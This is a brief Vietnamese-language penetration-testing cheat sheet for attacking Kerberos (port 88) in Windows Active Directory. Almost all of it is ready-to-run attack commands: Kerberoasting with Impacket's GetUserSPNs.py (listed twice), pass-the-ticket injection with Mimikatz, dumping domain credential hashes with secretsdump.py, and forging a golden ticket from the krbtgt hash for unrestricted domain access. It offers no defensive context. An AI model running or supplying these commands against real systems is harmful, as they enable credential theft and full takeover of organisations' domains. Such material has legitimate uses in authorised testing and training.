Kerberos (Port 88)

Enumeration

Sử dụng GetUserSPNs.py từ Impacket để lấy thông tin SPN và tên người dùng hợp lệ:

python GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>

Sử dụng ticket Kerberos hợp lệ để xác thực bằng cách tiêm vào bộ nhớ với Mimikatz:

mimikatz "kerberos::ptt <ticket.kirbi>"

Yêu cầu ticket dịch vụ từ tài khoản có SPN để bẻ khóa ngoại tuyến:

python GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>

Trích xuất ticket, hàm băm và dữ liệu quan trọng từ hệ thống bằng secretsdump.py:

python secretsdump.py -just-dc <domain>/<user>:<password>@<ip>

Tạo ticket vàng để truy cập không giới hạn vào domain:

mimikatz "kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<krbtgt_hash> /id:500"